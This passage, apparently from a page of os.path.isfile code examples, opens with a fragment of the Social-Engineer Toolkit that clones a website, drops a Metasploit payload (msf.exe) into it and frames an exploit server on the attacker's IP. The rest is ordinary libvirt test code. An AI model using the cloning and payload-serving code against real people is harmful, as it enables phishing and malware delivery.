                                                shutil.copyfile("src/html/msf.exe", "src/program_junk/web_clone/msf.exe")
                                                print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                                        shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/web_clone/%s" % (rand_gen))
                os.chdir("%s/src/program_junk/web_clone" % (definepath))
                

        # if docbase exploit do some funky stuff to get it to work right
        #  <TITLE>Client  Log In</TITLE>
        if os.path.isfile("%s/src/program_junk/docbase.file" % (definepath)):
                docbase=(r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
  		 "http://www.w3.org/TR/html4/frameset.dtd">
		<HTML>
		<HEAD>
		<TITLE></TITLE>
		</HEAD>
		<FRAMESET rows="99%%, 1%%">
      		<FRAME src="site.html">
      		<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
		</FRAMESET>
		</HTML>""" % (ipaddr))
                if os.path.isfile("%s/src/program_junk/web_clone/site.html" % (definepath)): os.remove("%s/src/program_junk/web_clone/site.html" % (definepath))
                shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/src/program_junk/web_clone/site.html" % (definepath))
                filewrite=file("%s/src/program_junk/web_clone/index.html" % (definepath), "w")
                filewrite.write(docbase)
                filewrite.close()

        ####################################################################################################################################
        #
        # START WEB SERVER STUFF HERE
        #
        ####################################################################################################################################
        if apache == 0:
                if multiattack_harv == 'off':
                        # specify port listener here
                        # get SimpleHTTP up and running
                        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
                        class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
                                pass

                        try:
                                class ReusableTCPServer(SocketServer.TCPServer):
                                        allow_reuse_address = True
                                server = ReusableTCPServer(('', int(web_port)), Handler)
                                thread.start_new_thread(server.serve_forever, ())
                                
                        # Handle KeyboardInterrupt
                        except KeyboardInterrupt:
                                ExitSet()
                
                        # Handle Exceptions
                        except Exception,e:
                                print e
                                log(e)
                                print bcolors.RED + "ERROR: You probably have something running on port 80 already, Apache??"
                                print "There was an issue, printing error: " +str(e) + bcolors.ENDC
                                ExitSet()
                        
                        # if we are custom, put a pause here to not terminate thread on web server
                        if template == "CUSTOM" or template == "SELF":
                                custom_exe = check_options("CUSTOM_EXE=")
                                if custom_exe != 0:
                                        while 1: 
                                                # try block inside of loop, if control-c detected, then exit
                                                try:
                                                        pause = raw_input(bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)

                                                # handle keyboard interrupt
                                                except KeyboardInterrupt:
                                                        print bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC
                                                        break

        if apache == 1:
                subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/html/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()

        #####################################################################################################################################
        #
        # END WEB SERVER STUFF HERE
        #
        #####################################################################################################################################

        if operating_system != "windows":
                # Grab metaspoit path
                msf_path=meta_path()
                import pexpect
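
Worth noting is how spawn.py uses os.path.isfile less as a safety check and more as a flag store: the mere existence of files such as src/program_junk/meta_config or src/program_junk/multi_harvester toggles behaviour. A compact sketch of that marker-file idiom (the directory name below is illustrative):

import os

FLAG_DIR = "state"  # illustrative; SET keeps its markers under src/program_junk

def flag_set(name):
    # A flag is "on" exactly when its marker file exists.
    return os.path.isfile(os.path.join(FLAG_DIR, name))

def set_flag(name):
    # Create an empty marker file to switch the flag on.
    if not os.path.isdir(FLAG_DIR):
        os.makedirs(FLAG_DIR)
    open(os.path.join(FLAG_DIR, name), "w").close()

# e.g. multiattack_harv = "on" if flag_set("multi_harvester") else "off"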

Example 37

Project: tp-libvirt
Source File: remote_access.py
View license
def run(test, params, env):
    """
    Test remote access with TCP, TLS connection
    """

    test_dict = dict(params)
    vm_name = test_dict.get("main_vm")
    status_error = test_dict.get("status_error", "no")
    allowed_dn_str = params.get("tls_allowed_dn_list")
    if allowed_dn_str:
        allowed_dn_list = []
        if not libvirt_version.version_compare(1, 0, 0):
            # Reverse the order in the dn list to work around the
            # feature changes between RHEL 6 and RHEL 7
            dn_list = allowed_dn_str.split(",")
            dn_list.reverse()
            allowed_dn_str = ','.join(dn_list)
        allowed_dn_list.append(allowed_dn_str)
        test_dict['tls_allowed_dn_list'] = allowed_dn_list
    transport = test_dict.get("transport")
    plus = test_dict.get("conn_plus", "+")
    config_ipv6 = test_dict.get("config_ipv6", "no")
    tls_port = test_dict.get("tls_port", "")
    listen_addr = test_dict.get("listen_addr", "0.0.0.0")
    ssh_port = test_dict.get("ssh_port", "")
    tcp_port = test_dict.get("tcp_port", "")
    server_ip = test_dict.get("server_ip")
    server_user = test_dict.get("server_user")
    server_pwd = test_dict.get("server_pwd")
    no_any_config = params.get("no_any_config", "no")
    sasl_user_pwd = test_dict.get("sasl_user_pwd")
    sasl_allowed_users = test_dict.get("sasl_allowed_users")
    server_cn = test_dict.get("server_cn")
    custom_pki_path = test_dict.get("custom_pki_path")
    rm_client_key_cmd = test_dict.get("remove_client_key_cmd")
    rm_client_cert_cmd = test_dict.get("remove_client_cert_cmd")
    ca_cn_new = test_dict.get("ca_cn_new")
    no_verify = test_dict.get("no_verify", "no")
    ipv6_addr_des = test_dict.get("ipv6_addr_des")
    tls_sanity_cert = test_dict.get("tls_sanity_cert")
    restart_libvirtd = test_dict.get("restart_libvirtd", "yes")
    diff_virt_ver = test_dict.get("diff_virt_ver", "no")
    driver = test_dict.get("test_driver", "qemu")
    uri_path = test_dict.get("uri_path", "/system")
    virsh_cmd = params.get("virsh_cmd", "list")
    action = test_dict.get("libvirtd_action", "restart")
    uri_user = test_dict.get("uri_user", "")
    unix_sock_dir = test_dict.get("unix_sock_dir")
    mkdir_cmd = test_dict.get("mkdir_cmd")
    rmdir_cmd = test_dict.get("rmdir_cmd")
    adduser_cmd = test_dict.get("adduser_cmd")
    deluser_cmd = test_dict.get("deluser_cmd")
    auth_conf = test_dict.get("auth_conf")
    auth_conf_cxt = test_dict.get("auth_conf_cxt")
    polkit_pkla = test_dict.get("polkit_pkla")
    polkit_pkla_cxt = test_dict.get("polkit_pkla_cxt")
    ssh_setup = test_dict.get("ssh_setup", "no")
    tcp_setup = test_dict.get("tcp_setup", "no")
    tls_setup = test_dict.get("tls_setup", "no")
    unix_setup = test_dict.get("unix_setup", "no")
    ssh_recovery = test_dict.get("ssh_auto_recovery", "yes")
    tcp_recovery = test_dict.get("tcp_auto_recovery", "yes")
    tls_recovery = test_dict.get("tls_auto_recovery", "yes")
    unix_recovery = test_dict.get("unix_auto_recovery", "yes")

    port = ""
    # extra URI arguments
    extra_params = ""
    # it's used to clean up SSH, TLS, TCP, UNIX and SASL objs later
    objs_list = []
    # redirect LIBVIRT_DEBUG log into test log later
    test_dict["logfile"] = test.logfile

    # Make sure all of parameters are assigned a valid value
    check_parameters(test_dict)

    # only simply connect libvirt daemon then return
    if no_any_config == "yes":
        test_dict["uri"] = "%s%s%s://%s" % (driver, plus, transport, uri_path)
        remote_access(test_dict)
        return

    # append extra 'pkipath' argument to URI if exists
    if custom_pki_path:
        extra_params = "?pkipath=%s" % custom_pki_path

    # append extra 'no_verify' argument to URI if exists
    if no_verify == "yes":
        extra_params = "?no_verify=1"

    # append extra 'socket' argument to URI if exists
    if unix_sock_dir:
        extra_params = "?socket=%s/libvirt-sock" % unix_sock_dir

    # generate auth.conf and default under the '/etc/libvirt'
    if auth_conf_cxt and auth_conf:
        cmd = "echo -e '%s' > %s" % (auth_conf_cxt, auth_conf)
        utils.system(cmd, ignore_status=True)

    # generate polkit_pkla and default under the
    # '/etc/polkit-1/localauthority/50-local.d/'
    if polkit_pkla_cxt and polkit_pkla:
        cmd = "echo -e '%s' > %s" % (polkit_pkla_cxt, polkit_pkla)
        utils.system(cmd, ignore_status=True)

    # generate remote IP
    if config_ipv6 == "yes" and ipv6_addr_des:
        remote_ip = "[%s]" % ipv6_addr_des
    elif config_ipv6 != "yes" and server_cn:
        remote_ip = server_cn
    elif config_ipv6 != "yes" and ipv6_addr_des:
        remote_ip = "[%s]" % ipv6_addr_des
    elif server_ip and transport != "unix":
        remote_ip = server_ip
    else:
        remote_ip = ""

    # get URI port
    if tcp_port != "":
        port = ":" + tcp_port

    if tls_port != "":
        port = ":" + tls_port

    if ssh_port != "" and not ipv6_addr_des:
        port = ":" + ssh_port

    # generate URI
    uri = "%s%s%s://%s%s%s%s%s" % (driver, plus, transport, uri_user,
                                   remote_ip, port, uri_path, extra_params)
    test_dict["uri"] = uri

    logging.debug("The final test dict:\n<%s>", test_dict)

    if virsh_cmd == "start" and transport != "unix":
        session = remote.wait_for_login("ssh", server_ip, "22", "root",
                                        server_pwd, "#")
        cmd = "virsh domstate %s" % vm_name
        status, output = session.cmd_status_output(cmd)
        if status:
            session.close()
            raise error.TestNAError(output)

        session.close()

    try:
        # setup IPv6
        if config_ipv6 == "yes":
            ipv6_obj = IPv6Manager(test_dict)
            objs_list.append(ipv6_obj)
            ipv6_obj.setup()

        # compare libvirt version if needs
        if diff_virt_ver == "yes":
            compare_virt_version(server_ip, server_user, server_pwd)

        # setup SSH
        if transport == "ssh" or ssh_setup == "yes":
            if not test_dict.get("auth_pwd"):
                ssh_obj = SSHConnection(test_dict)
                if ssh_recovery == "yes":
                    objs_list.append(ssh_obj)
                # setup test environment
                ssh_obj.conn_setup()

        # setup TLS
        if transport == "tls" or tls_setup == "yes":
            tls_obj = TLSConnection(test_dict)
            if tls_recovery == "yes":
                objs_list.append(tls_obj)
            # reserve cert path
            tmp_dir = tls_obj.tmp_dir
            # setup test environment
            if tls_sanity_cert == "no":
                # only setup CA and client
                tls_obj.conn_setup(False, True)
            else:
                # setup CA, server and client
                tls_obj.conn_setup()

        # setup TCP
        if transport == "tcp" or tcp_setup == "yes":
            tcp_obj = TCPConnection(test_dict)
            if tcp_recovery == "yes":
                objs_list.append(tcp_obj)
            # setup test environment
            tcp_obj.conn_setup()

        # create a directory if needed
        if mkdir_cmd:
            utils.system(mkdir_cmd, ignore_status=True)

        # setup UNIX
        if transport == "unix" or unix_setup == "yes":
            unix_obj = UNIXConnection(test_dict)
            if unix_recovery == "yes":
                objs_list.append(unix_obj)
            # setup test environment
            unix_obj.conn_setup()

        # need to restart libvirt service for negative testing
        if restart_libvirtd == "no":
            remotely_control_libvirtd(server_ip, server_user,
                                      server_pwd, action, status_error)

        # check TCP/IP listening by service
        if restart_libvirtd != "no" and transport != "unix":
            service = 'libvirtd'
            if transport == "ssh":
                service = 'ssh'

            check_listening_port_remote_by_service(server_ip, server_user,
                                                   server_pwd, service,
                                                   port, listen_addr)

        # remove client certificates if they exist, only for TLS negative testing
        if rm_client_key_cmd:
            utils.system(rm_client_key_cmd, ignore_status=True)

        if rm_client_cert_cmd:
            utils.system(rm_client_cert_cmd, ignore_status=True)

        # add user to specific group
        if adduser_cmd:
            utils.system(adduser_cmd, ignore_status=True)

        # change /etc/pki/libvirt/servercert.pem then
        # restart libvirt service on the remote host
        if tls_sanity_cert == "no" and ca_cn_new:
            test_dict['ca_cn'] = ca_cn_new
            test_dict['ca_cakey_path'] = tmp_dir
            test_dict['scp_new_cacert'] = 'no'
            tls_obj_new = TLSConnection(test_dict)
            test_dict['tls_obj_new'] = tls_obj_new
            # only setup new CA and server
            tls_obj_new.conn_setup(True, False)

        # setup SASL certification
        if sasl_user_pwd:
            # convert string tuples and lists to Python data types
            sasl_user_pwd = eval(sasl_user_pwd)
            if sasl_allowed_users:
                sasl_allowed_users = eval(sasl_allowed_users)

            # create a sasl user
            sasl_obj = SASL(test_dict)
            objs_list.append(sasl_obj)
            sasl_obj.setup()

            for sasl_user, sasl_pwd in sasl_user_pwd:
                # no authentication needed if auth.conf is configured by the user
                if not auth_conf:
                    test_dict["auth_user"] = sasl_user
                    test_dict["auth_pwd"] = sasl_pwd
                    logging.debug("sasl_user, sasl_pwd = "
                                  "(%s, %s)", sasl_user, sasl_pwd)

                if sasl_allowed_users and sasl_user not in sasl_allowed_users:
                    test_dict["status_error"] = "yes"
                patterns_extra_dict = {"authentication name": sasl_user}
                test_dict["patterns_extra_dict"] = patterns_extra_dict
                remote_access(test_dict)
        else:
            remote_access(test_dict)

    finally:
        # recover the test environment
        if rmdir_cmd:
            utils.system(rmdir_cmd, ignore_status=True)

        if deluser_cmd:
            utils.system(deluser_cmd, ignore_status=True)

        if auth_conf and os.path.isfile(auth_conf):
            os.unlink(auth_conf)

        if polkit_pkla and os.path.isfile(polkit_pkla):
            os.unlink(polkit_pkla)

        cleanup(objs_list)
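
The finally block above guards each os.unlink() with os.path.isfile(), so teardown never raises on a config file that was never written. A minimal sketch of that guard pattern; the helper name and paths are hypothetical, not part of the example:

import os

def remove_if_file(path):
    # Remove path only when it exists and is a regular file;
    # a missing or non-regular path is silently ignored.
    if path and os.path.isfile(path):
        os.unlink(path)

# hypothetical config files generated by a test run
for cfg in ("/tmp/auth.conf", "/tmp/polkit.pkla"):
    remove_if_file(cfg)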

Example 38

Project: tp-libvirt
Source File: virsh_setmem.py
View license
def run(test, params, env):
    """
    Test command: virsh setmem.

    1) Prepare the VM environment.
    2) Handle params.
    3) Prepare libvirtd status.
    4) Run the test command and wait for the current memory to stabilize.
    5) Recover the environment.
    6) Check the result.
    """

    def vm_usable_mem(session):
        """
        Get total usable RAM from /proc/meminfo
        """
        cmd = "cat /proc/meminfo"
        proc_mem = session.cmd_output(cmd)
        total_usable_mem = re.search(r'MemTotal:\s+(\d+)\s+[kK]B',
                                     proc_mem).group(1)
        return int(total_usable_mem)

    def vm_unusable_mem(session):
        """
        Get the unusable RAM of the VM.
        """
        # Get total physical memory from dmidecode
        cmd = "dmidecode -t 17"
        dmi_mem = session.cmd_output(cmd)
        total_physical_mem = reduce(lambda x, y: int(x) + int(y),
                                    re.findall(r'Size:\s(\d+)\sMB', dmi_mem))
        return int(total_physical_mem) * 1024 - vm_usable_mem(session)

    def make_domref(domarg, vm_ref, domid, vm_name, domuuid):
        """
        Create domain options of command
        """
        # Specify domain as argument or parameter
        if domarg == "yes":
            dom_darg_key = "domainarg"
        else:
            dom_darg_key = "domain"

        # How to reference domain
        if vm_ref == "domid":
            dom_darg_value = domid
        elif vm_ref == "domname":
            dom_darg_value = vm_name
        elif vm_ref == "domuuid":
            dom_darg_value = domuuid
        elif vm_ref == "none":
            dom_darg_value = None
        elif vm_ref == "emptystring":
            dom_darg_value = '""'
        else:  # stick in value directly
            dom_darg_value = vm_ref

        return {dom_darg_key: dom_darg_value}

    def make_sizeref(sizearg, mem_ref, original_mem):
        """
        Create size options of command
        """
        if sizearg == "yes":
            size_darg_key = "sizearg"
        else:
            size_darg_key = "size"

        if mem_ref == "halfless":
            size_darg_value = "%d" % (original_mem / 2)
        elif mem_ref == "halfmore":
            size_darg_value = "%d" % int(original_mem * 1.5)  # no fraction
        elif mem_ref == "same":
            size_darg_value = "%d" % original_mem
        elif mem_ref == "emptystring":
            size_darg_value = '""'
        elif mem_ref == "zero":
            size_darg_value = "0"
        elif mem_ref == "toosmall":
            size_darg_value = "1024"
        elif mem_ref == "toobig":
            size_darg_value = "1099511627776"  # (KiB) One Petabyte
        elif mem_ref == "none":
            size_darg_value = None
        else:  # stick in value directly
            size_darg_value = mem_ref

        return {size_darg_key: size_darg_value}

    def cal_deviation(actual, expected):
        """
        Calculate deviation of actual result and expected result
        """
        numerator = float(actual)
        denominator = float(expected)
        if numerator > denominator:
            numerator = denominator
            denominator = float(actual)
        return 100 - (100 * (numerator / denominator))

    def is_old_libvirt():
        """
        Check if libvirt is old version
        """
        regex = r'\s+\[--size\]\s+'
        return bool(not virsh.has_command_help_match('setmem', regex))

    def print_debug_stats(original_inside_mem, original_outside_mem,
                          test_inside_mem, test_outside_mem,
                          expected_outside_mem, expected_inside_mem,
                          delta_percentage, unusable_mem):
        """
        Print debug message for test
        """
        # Calculate deviation
        inside_deviation = cal_deviation(test_inside_mem, expected_inside_mem)
        outside_deviation = cal_deviation(test_outside_mem, expected_outside_mem)
        dbgmsg = ("Unusable memory of VM   : %d KiB\n"
                  "Original inside memory  : %d KiB\n"
                  "Expected inside memory  : %d KiB\n"
                  "Actual inside memory    : %d KiB\n"
                  "Inside memory deviation : %0.2f%%\n"
                  "Original outside memory : %d KiB\n"
                  "Expected outside memory : %d KiB\n"
                  "Actual outside memory   : %d KiB\n"
                  "Outside memory deviation: %0.2f%%\n"
                  "Acceptable deviation    : %0.2f%%" % (
                      unusable_mem,
                      original_inside_mem,
                      expected_inside_mem,
                      test_inside_mem,
                      inside_deviation,
                      original_outside_mem,
                      expected_outside_mem,
                      test_outside_mem,
                      outside_deviation,
                      delta_percentage))
        for dbgline in dbgmsg.splitlines():
            logging.debug(dbgline)

    # MAIN TEST CODE ###
    # Process cartesian parameters
    vm_ref = params.get("setmem_vm_ref", "")
    mem_ref = params.get("setmem_mem_ref", "")
    flags = params.get("setmem_flags", "")
    status_error = "yes" == params.get("status_error", "no")
    old_libvirt_fail = "yes" == params.get("setmem_old_libvirt_fail", "no")
    quiesce_delay = int(params.get("setmem_quiesce_delay", "1"))
    domarg = params.get("setmem_domarg", "no")
    sizearg = params.get("setmem_sizearg", "no")
    libvirt = params.get("libvirt", "on")
    delta_percentage = float(params.get("setmem_delta_per", "10"))
    start_vm = "yes" == params.get("start_vm", "yes")
    vm_name = params.get("main_vm", "avocado-vt-vm1")
    paused_after_start_vm = "yes" == params.get("paused_after_start_vm", "no")
    manipulate_dom_before_setmem = "yes" == params.get(
        "manipulate_dom_before_setmem", "no")
    manipulate_dom_after_setmem = "yes" == params.get(
        "manipulate_dom_after_setmem", "no")
    manipulate_action = params.get("manipulate_action", "")

    vm = env.get_vm(vm_name)
    # Back up domain XML
    vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    backup_xml = vmxml.copy()

    vmosxml = vmxml.os
    need_mkswap = False
    if manipulate_action in ['s3', 's4']:
        vm.destroy()
        BIOS_BIN = "/usr/share/seabios/bios.bin"
        if os.path.isfile(BIOS_BIN):
            vmosxml.loader = BIOS_BIN
            vmxml.os = vmosxml
            vmxml.sync()
        else:
            logging.error("Not find %s on host", BIOS_BIN)
        vmxml.set_pm_suspend(vm_name, "yes", "yes")
        vm.prepare_guest_agent()
        if manipulate_action == "s4":
            need_mkswap = not vm.has_swap()
        if need_mkswap:
            logging.debug("Creating swap partition")
            vm.create_swap_partition()

    memballoon_model = params.get("memballoon_model", "")
    if memballoon_model:
        vm.destroy()
        vmxml.del_device('memballoon', by_tag=True)
        memballoon_xml = vmxml.get_device_class('memballoon')()
        memballoon_xml.model = memballoon_model
        vmxml.add_device(memballoon_xml)
        logging.info(memballoon_xml)
        vmxml.sync()
        vm.start()

    remove_balloon_driver = "yes" == params.get("remove_balloon_driver", "no")
    if remove_balloon_driver:
        if not vm.is_alive():
            logging.error("Can't remove module as guest not running")
        else:
            session = vm.wait_for_login()
            cmd = "rmmod virtio_balloon"
            s_rmmod, o_rmmod = session.cmd_status_output(cmd)
            if s_rmmod != 0:
                logging.error("Fail to remove module virtio_balloon in guest:\n%s",
                              o_rmmod)
            session.close()
    # Get original data
    domid = vm.get_id()
    domuuid = vm.get_uuid()
    uri = vm.connect_uri
    if not vm.is_alive():
        vm.start()
    session = vm.wait_for_login()
    if session.cmd_status('dmidecode'):
        # The physical memory size is in the VM XML; use it when dmidecode
        # is not supported
        unusable_mem = int(vmxml.max_mem) - vm_usable_mem(session)
    else:
        unusable_mem = vm_unusable_mem(session)
    original_outside_mem = vm.get_used_mem()
    original_inside_mem = vm_usable_mem(session)
    session.close()
    # Prepare VM state
    if not start_vm:
        vm.destroy()
    else:
        if paused_after_start_vm:
            vm.pause()
    old_libvirt = is_old_libvirt()
    if old_libvirt:
        logging.info("Running test on older libvirt")
        use_kilobytes = True
    else:
        logging.info("Running test on newer libvirt")
        use_kilobytes = False

    # Argument pattern is complex, build with dargs
    dargs = {'flagstr': flags,
             'use_kilobytes': use_kilobytes,
             'uri': uri, 'ignore_status': True, "debug": True}
    dargs.update(make_domref(domarg, vm_ref, domid, vm_name, domuuid))
    dargs.update(make_sizeref(sizearg, mem_ref, original_outside_mem))

    # Prepare libvirtd status
    libvirtd = utils_libvirtd.Libvirtd()
    if libvirt == "off":
        libvirtd.stop()
    else:
        if not libvirtd.is_running():
            libvirtd.start()

    if status_error or (old_libvirt_fail and old_libvirt):
        logging.info("Error Test: Expecting an error to occur!")

    try:
        memory_change = True
        if manipulate_dom_before_setmem:
            manipulate_domain(vm_name, manipulate_action)
            if manipulate_action in ['save', 'managedsave', 's4']:
                memory_change = False

        result = virsh.setmem(**dargs)
        status = result.exit_status

        if status == 0:
            logging.info(
                "Waiting %d seconds for VM memory to settle", quiesce_delay)
            # It takes time for the kernel to settle on the new memory,
            # and the number of clean pages is not predictable. It is
            # therefore extremely difficult to determine quiescence, so
            # sleeping one second per error percent is a reasonable option.
            time.sleep(quiesce_delay)

        if manipulate_dom_before_setmem:
            manipulate_domain(vm_name, manipulate_action, True)
        if manipulate_dom_after_setmem:
            manipulate_domain(vm_name, manipulate_action)
            manipulate_domain(vm_name, manipulate_action, True)

        # Recover libvirtd status
        if libvirt == "off":
            libvirtd.start()

        # Gather stats if not running error test
        if not status_error and not old_libvirt_fail:
            if not memory_change:
                test_inside_mem = original_inside_mem
                test_outside_mem = original_outside_mem
            else:
                if vm.state() == "shut off":
                    vm.start()
                # Make sure it's never paused
                vm.resume()
                session = vm.wait_for_login()

                # Actual results
                test_inside_mem = vm_usable_mem(session)
                session.close()
                test_outside_mem = vm.get_used_mem()

            # Expected results for both inside and outside
            if remove_balloon_driver:
                expected_mem = original_outside_mem
            else:
                if not memory_change:
                    expected_mem = original_inside_mem
                elif sizearg == "yes":
                    expected_mem = int(dargs["sizearg"])
                else:
                    expected_mem = int(dargs["size"])
            if memory_change:
                # Should minus unusable memory for inside memory check
                expected_inside_mem = expected_mem - unusable_mem
                expected_outside_mem = expected_mem
            else:
                expected_inside_mem = expected_mem
                expected_outside_mem = original_outside_mem

            print_debug_stats(original_inside_mem, original_outside_mem,
                              test_inside_mem, test_outside_mem,
                              expected_outside_mem, expected_inside_mem,
                              delta_percentage, unusable_mem)

            # Don't care about memory comparison on error test
            outside_pass = cal_deviation(test_outside_mem,
                                         expected_outside_mem) <= delta_percentage
            inside_pass = cal_deviation(test_inside_mem,
                                        expected_inside_mem) <= delta_percentage
            if status != 0 or not outside_pass or not inside_pass:
                msg = "test conditions not met: "
                if status != 0:
                    msg += "Non-zero virsh setmem exit code. "
                if not outside_pass:
                    msg += "Outside memory deviated. "
                if not inside_pass:
                    msg += "Inside memory deviated. "
                raise error.TestFail(msg)

            return  # Normal test passed
        elif not status_error and old_libvirt_fail:
            if status == 0:
                if old_libvirt:
                    raise error.TestFail("Error test did not result in an error")
            else:
                if not old_libvirt:
                    raise error.TestFail("Newer libvirt failed when it should not")
        else:  # Verify an error test resulted in error
            if status == 0:
                raise error.TestFail("Error test did not result in an error")
    finally:
        if need_mkswap:
            vm.cleanup_swap()
        vm.destroy()
        backup_xml.sync()
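
In the s3/s4 branch above, os.path.isfile() probes for an optional host file (the SeaBIOS binary) and the test degrades gracefully when it is absent. A minimal sketch of that probe-with-fallback pattern; the function name is hypothetical:

import logging
import os

BIOS_BIN = "/usr/share/seabios/bios.bin"

def pick_loader(path=BIOS_BIN):
    # Return the loader path when present on the host, else None
    # so the caller can fall back to the default firmware.
    if os.path.isfile(path):
        return path
    logging.error("Cannot find %s on host", path)
    return None

loader = pick_loader()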

Example 39

View license
def check_snapslist(vm_name, options, option_dict, output,
                    snaps_before, snaps_list):
    no_metadata = options.find("--no-metadata")
    fdisks = "disks"

    # a command with print-xml will not really create a snapshot
    if options.find("print-xml") >= 0:
        xtf = xml_utils.XMLTreeFile(output)

        # With --print-xml no new snapshot is created
        if len(snaps_before) != len(snaps_list):
            raise error.TestFail("--print-xml create new snapshot")

    else:
        # The following does not check with print-xml
        get_sname = output.split()[2]

        # checking domain/snapshot XML depends on whether we have metadata
        if no_metadata < 0:
            output_dump = virsh.snapshot_dumpxml(vm_name,
                                                 get_sname).stdout.strip()
        else:
            output_dump = virsh.dumpxml(vm_name).stdout.strip()
            fdisks = "devices"

        xtf = xml_utils.XMLTreeFile(output_dump)

        find = 0
        for snap in snaps_list:
            if snap == get_sname:
                find = 1
                break

        # Should find snap in snaplist without --no-metadata
        if (find == 0 and no_metadata < 0):
            raise error.TestFail("Can not find snapshot %s!"
                                 % get_sname)
        # Should not find snap in list without metadata
        elif (find == 1 and no_metadata >= 0):
            raise error.TestFail("Can find snapshot metadata even "
                                 "if have --no-metadata")
        elif (find == 0 and no_metadata >= 0):
            logging.info("Can not find snapshot %s as no-metadata "
                         "is given" % get_sname)

            # Check snapshot only in qemu-img
            if (options.find("--disk-only") < 0 and
                    options.find("--memspec") < 0):
                ret = check_snap_in_image(vm_name, get_sname)

                if ret is False:
                    raise error.TestFail("No snap info in image")

        else:
            logging.info("Find snapshot %s in snapshot list."
                         % get_sname)

        # Check if the disk file exist when disk-only is given
        if options.find("disk-only") >= 0:
            for disk in xtf.find(fdisks).findall('disk'):
                if disk.get('snapshot') == 'no':
                    continue
                diskpath = disk.find('source').get('file')
                if os.path.isfile(diskpath):
                    logging.info("disk file %s exist" % diskpath)
                    os.remove(diskpath)
                else:
                    # Didn't find <source file="path to disk"/>
                    # in output - this could leave a file around
                    # wherever the main OS image file is found
                    logging.debug("output_dump=%s", output_dump)
                    raise error.TestFail("Can not find disk %s"
                                         % diskpath)

        # Check if the guest is halted when 'halt' is given
        if options.find("halt") >= 0:
            domstate = virsh.domstate(vm_name)
            if re.match("shut off", domstate.stdout):
                logging.info("Domain is halted after create "
                             "snapshot")
            else:
                raise error.TestFail("Domain is not halted after "
                                     "snapshot created")

    # Check the snapshot xml regardless of having print-xml or not
    if (options.find("name") >= 0 and no_metadata < 0):
        if xtf.findtext('name') == option_dict["name"]:
            logging.info("get snapshot name same as set")
        else:
            raise error.TestFail("Get wrong snapshot name %s" %
                                 xtf.findtext('name'))

    if (options.find("description") >= 0 and no_metadata < 0):
        desc = xtf.findtext('description')
        if desc == option_dict["description"]:
            logging.info("get snapshot description same as set")
        else:
            raise error.TestFail("Get wrong description on xml")

    if options.find("diskspec") >= 0:
        if isinstance(option_dict['diskspec'], list):
            index = len(option_dict['diskspec'])
        else:
            index = 1

        disks = xtf.find(fdisks).findall('disk')

        for num in range(index):
            if isinstance(option_dict['diskspec'], list):
                option_disk = option_dict['diskspec'][num]
            else:
                option_disk = option_dict['diskspec']

            option_disk = "name=" + option_disk
            disk_dict = utils_misc.valued_option_dict(option_disk,
                                                      ",", 0, "=")
            logging.debug("disk_dict is %s", disk_dict)

            # For a no-metadata snapshot do not check the name and
            # snapshot attributes
            if no_metadata < 0:
                dname = disks[num].get('name')
                logging.debug("dname is %s", dname)
                if dname == disk_dict['name']:
                    logging.info("get disk%d name same as set in "
                                 "diskspec", num)
                else:
                    raise error.TestFail("Get wrong disk%d name %s"
                                         % num, dname)

                if option_disk.find('snapshot=') >= 0:
                    dsnap = disks[num].get('snapshot')
                    logging.debug("dsnap is %s", dsnap)
                    if dsnap == disk_dict['snapshot']:
                        logging.info("get disk%d snapshot type same"
                                     " as set in diskspec", num)
                    else:
                        raise error.TestFail("Get wrong disk%d "
                                             "snapshot type %s" %
                                             num, dsnap)

            if option_disk.find('driver=') >= 0:
                dtype = disks[num].find('driver').get('type')
                if dtype == disk_dict['driver']:
                    logging.info("get disk%d driver type same as "
                                 "set in diskspec", num)
                else:
                    raise error.TestFail("Get wrong disk%d driver "
                                         "type %s" % num, dtype)

            if option_disk.find('file=') >= 0:
                sfile = disks[num].find('source').get('file')
                if sfile == disk_dict['file']:
                    logging.info("get disk%d source file same as "
                                 "set in diskspec", num)
                    if os.path.exists(sfile):
                        os.unlink(sfile)
                else:
                    raise error.TestFail("Get wrong disk%d source "
                                         "file %s" % num, sfile)

    # For memspec check if the xml is same as setting
    # Also check if the mem file exists
    if options.find("memspec") >= 0:
        memspec = option_dict['memspec']
        if not re.search('file=', option_dict['memspec']):
            memspec = 'file=' + option_dict['memspec']

        mem_dict = utils_misc.valued_option_dict(memspec, ",", 0,
                                                 "=")
        logging.debug("mem_dict is %s", mem_dict)

        if no_metadata < 0:
            if memspec.find('snapshot=') >= 0:
                snap = xtf.find('memory').get('snapshot')
                if snap == mem_dict['snapshot']:
                    logging.info("get memory snapshot type same as"
                                 " set in diskspec")
                else:
                    raise error.TestFail("Get wrong memory snapshot"
                                         " type on print xml")

            memfile = xtf.find('memory').get('file')
            if memfile == mem_dict['file']:
                logging.info("get memory file same as set in "
                             "diskspec")
            else:
                raise error.TestFail("Get wrong memory file on "
                                     "print xml %s", memfile)

        if options.find("print-xml") < 0:
            if os.path.isfile(mem_dict['file']):
                logging.info("memory file generated")
                os.remove(mem_dict['file'])
            else:
                raise error.TestFail("Fail to generate memory file"
                                     " %s", mem_dict['file'])

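This checker uses os.path.isfile() to verify that snapshot side effects (disk overlays, memory files) actually landed on disk, then removes them so repeated runs start clean. A minimal verify-then-delete sketch; the helper and paths are hypothetical:

import os

def consume_artifact(path):
    # Verify a generated file exists, then delete it to keep the
    # host clean; return False when the artifact is missing.
    if not os.path.isfile(path):
        return False
    os.remove(path)
    return True

# hypothetical artifacts produced by a snapshot test
for artifact in ("/tmp/overlay.qcow2", "/tmp/memsnap.save"):
    if not consume_artifact(artifact):
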